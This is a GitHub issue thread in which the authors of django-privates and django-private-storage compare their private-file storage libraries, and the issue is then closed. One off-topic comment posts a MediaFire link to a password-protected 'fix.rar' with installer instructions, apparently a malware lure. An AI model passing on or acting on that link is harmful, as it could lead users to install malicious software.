### ISSUE TITLE
Duplication of django-private-storage?

### ISSUE THREAD

**Issue by vdboor** [sergei-maertens/django-privates#9]
Hi!

I just found this repository. I wonder, is there anything that was missing in your opinion from what https://github.com/edoburu/django-private-storage/ offers? It looks like our goals are pretty similar.

Best,
Diederik

**Comment by sergei-maertens** [comment]
I took a look - I'm not sure if I came across your library at the time or not, but I did come across django-storages and concluded that it was doing way too much for what I/we needed.

The goal for this library is to only support file system storage and be as minimal as possible, while being able to aggressively drop support for old/unmaintained versions of python/django (I ser you're still supporting django 1.11)

**Comment by vdboor** [comment]
Yes django-storages is brilliant for supporting various cloud storages. We both want to have a storage class for private files, and have a decent way of exposing/serving those files. The library was developed against Django 1.11 so there may still be references, but it only supports modern Django.

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sergei-maertens** [comment]
Closing this - I will keep maintaining django-privates as it is, and for my/our purposes it is feature-complete. It's good to know that other alternatives exist!
